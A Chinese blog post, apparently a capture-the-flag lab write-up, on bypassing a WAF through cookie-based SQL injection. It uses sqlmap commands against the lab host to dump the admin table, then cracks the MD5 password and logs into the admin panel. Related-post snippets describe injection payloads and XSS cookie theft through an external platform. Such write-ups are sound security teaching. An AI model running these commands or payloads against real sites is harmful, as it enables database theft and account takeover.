【封神台】SQL注入绕过WAF练习(cookie注入)

最新推荐文章于 2023-09-20 17:13:32 发布
最新推荐文章于 2023-09-20 17:13:32 发布
阅读量3.4k 收藏 4
点赞数
分类专栏: web CTF sql 文章标签: 安全 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/121375753
版权
CTF 同时被 3 个专栏收录
22 篇文章 2 订阅
订阅专栏
web
18 篇文章 0 订阅
订阅专栏
sql
9 篇文章 1 订阅
订阅专栏

题目

在这里插入图片描述

解题过程

进入网站
在这里插入图片描述
随便点击一个新闻,出现参数id,进行单引号测试:
在这里插入图片描述
提示参数不能包含非法字符,应该是黑名单过滤
猜测是cookie注入
burp抓包,将参数放入cookie中,页面正常访问:
在这里插入图片描述
单引号测试,页面报错,没有警告弹出
在这里插入图片描述
sqlmap跑出payload

python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2

在这里插入图片描述
跑出表

python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 --tables

在这里插入图片描述
跑出admin表的列

python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 -T admin --column

在这里插入图片描述
跑出username和password的数据

python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 --dump -T admin -C username,password

在这里插入图片描述
password的值在线解md5后结果为welcome
在这里插入图片描述
用户名为admin,密码为welcome
我们去找一下网站的后台
直接在网站后加/admin ,进入后台
在这里插入图片描述
输入账号密码,进入后台,获取flag
在这里插入图片描述

00勇士王子
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!
正在学习的路上...
07-18 3436
1.找注入点 进去之后,查看新闻,一般在这里有注入点。 输入 ?id=168 and 1=1 过滤了一些关键字,通过测试没有过滤 == order by == 2.猜列数、报显示位 通过测试,发现查询了10列 ?id=171 order by 10 ?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位 3.查看数据库版本和当前数据库名 ?id=1...
神台——WAF绕过
Zichel77的博客
07-04 612
没看到id,还是点进一篇新闻看看,因为新闻的页面是和新闻网站数据库产生交互的 是你呀id 是网站下的shownews.asp这个ASP动态网页文件,与数据库进行交互,并查询出了第171篇(id=171)新闻内容的值。 按照上次的老套路 准备来手工注入,构造 and 1=1 我人都要被吓尿了,感觉自己是不是会被请去喝茶 但是毕竟是练习,已经提醒了会有waf拦截,但是他只阻碍了传参中的一些参数,刚刚的and就被禁了 那我试一下不用and 注意,此题使用的是Access数据库,与MyS..
神台】有WAFSQL注入
qq_63806300的博客
12-26 345
神台wafsql注入
神台 第二章 绕过WAF
m0_65712192的博客
10-14 759
神台 第二章 利用ModHeader绕过WAF
神台--第二章:遇到阻难!绕过WAF过滤!解题思路
04-12 5484
神台--第二章:遇到阻难!绕过WAF过滤!解题思路 一、查找sql注入点 进入测试页面http://59.63.200.79:8004/ 1)字符型、数字型等盲注尝试 随意点开一篇文章,构造单引号',双引号"等闭合查询语句,发现提示如下 网站对请求地址进行了WAF防护,通过测试没有过滤 ==order by、union== 网页防护一般只拦截get、post传参,因此尝试cookie注入 2)cookie注入 cookie注入提交的参数以cookie方式提交,判断步骤 1.找到...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAFWeb Application Firewall)的常见特征是指其具有审计...
SQL注入WAF小结
05-08
自己总结SQL注入WAF小结,有人能指点指点就更好啦。。
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
Cookie注入漏洞:可绕过HTTPS并窃取私人信息
weixin_34194551的博客
08-01 594
近期,一个存在于主要浏览器的Web cookie中的严重漏洞被发现,它使安全的浏览方式(HTTPS)容易遭受中间人攻击。此外,大部分Web网站和流行的开源应用程序中可能都含有Cookie注入漏洞,包括:谷歌、亚马逊、eBay、苹果、美国银行、BitBucket、中国建设银行、中国银联、京东、phpMyAdmin以及MediaWiki。 美国计算机紧急响...
神台SQL注入-盲注
qq_40941912的博客
10-05 779
一、原理 所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 布尔型盲注 => 通过GET/_GET/G​ET/_POST传参获取后台数据库内容,并且可以通过URL栏/登录框进行SQL代码注入的 length() => 返回(字符串)长度的数值 substr([],[A],[B]) => 返回[]值中,[A]开始[B]位后的字符值 ascii() => 通过数值返回(此处内容)的阿斯克码 二、作业 (一) SQ
xss获取cookie神台第三章)
最新发布
qq_66013948的博客
09-20 375
之后,在xss.pt网站中注册一个账号,生成一个xss代码用po......的方式(非p时效短),然后将代码放在有xss漏洞的地方,上传表单。之前说过cookie就是在访问网站的时候第一个传递的数据,这其实是不全面的,cookie真正的指的其实就是某些网站为了辨别用户身份,进行session追踪而存储在用户本地终端上的数据,一般经过加密。首先应该看一下将能够输入内容的地方全部写上,然后观察后面的反馈,之后寻找xss注入点,可以按F12审查元素,寻找可执行的xss语句。
神台——Cookie伪造目标权限(存储型XSS)
Zichel77的博客
07-04 964
点击传送门看到的是一个留言板 我们首先要判断是否存在XSS 于是输入一串JS代码 看是否会弹出一个内容为'zkaq'的弹窗 出现了,说明存在XSS漏洞 关于XSS漏洞的科普如下 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输
绕过WAF-SQL
qq_30787769的博客
12-09 327
1.首先WAF的核心基本上是正则匹配,又由于安全和客户体验性挂钩,所以它不会什么都拦截,其拦截对象是搭配式语句 2.基本的绕过手法: 1. 如果and 1=1 被拦截时可以试试 and -1=-1试试,或者and true试试(一般没用) 2. 可以用&代替and,但是在url上&是连接的意思,所以需要写&的url编码 3. ?id=1可以写成?id=2-1 如果执行...
神台SQL注入-基础靶场1-布尔盲注
原味瓜子、的博客
10-09 1603
1
神台靶场,为了小芳,冲之——cookie注入
Wubuqing的博客
10-30 422
第二个靶场 打开网站 找一下注入点 一般在新闻这种里面点开看看 先判断是否存在注入waf 尝试了很多方法绕过都没成功,/and/,aandnd,AnD等一系列都没绕过去,乌鸡鲅鱼 删掉id=169 发现 然后判断cookie注入 在搜索框输入 Javascript:alert(document.cookie=”id=”+escape(‘169’)); 然后弹窗了(其中 “id=” 取决URL中的id= escape中的数值也是URL中id=的值)返回刚刚的页面,把ID删除后一样能正常显示。说明服务器能
神台cookie伪造目标权限
00勇士王子的博客
11-17 665
题目 解题过程 访问网站,是一个留言板 先用普通的xss测试一下 成功弹窗,说明地处存在xss漏洞 选择一个在线的xss平台,创建项目后输入平台的xss代码(我随便在网上找了一个xss平台如下:https://xss8.cc) 原理就是当管理员查看留言页面时触发xss,将管理员的cookie发送到该平台上面,从而实现利用管理员的cookie进行伪造目标权限 因为xss bot 每10秒访问一次页面,相当于管理员每10秒看一次留言,触发一次xss代码,所以在10秒后,xss平台接收到了目标的coo
详解新手如何绕过安全狗对网站进行Cookie中转注入攻击
1匹黑马
03-14 2965
随着网络安全逐渐被大家所重视,现在存在注入漏洞的网站越来越少(此处指asp+access或mssql),大多数网站使用了通用防注入程序,有的网站虽然没有直接使用通用防注入,但是其关键代码也是相差无几。 那么我们是不是就不能对这样的网站进行注入了呢?不!其实针对很多网站我们都可以使用cookie中转进行注入,刚好今天渗透了一个可以进行Cookie中转注入的网站,于是就把渗透心得分享给大家,小白操作,...
神台靶场---尤里的复仇Ⅰ小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 1393
神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习、靶场练习
揭秘SQL注入绕过WAF与过滤机制的策略
深入理解SQL注入绕过Web应用防火墙(WAF)和过滤机制是一门关键的技能,尤其是在IT安全领域。WAF是一种网络安全系统,旨在检测并阻止恶意攻击,尤其是针对Web应用程序的攻击,如SQL注入。本文将带你探讨以下几个关键...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值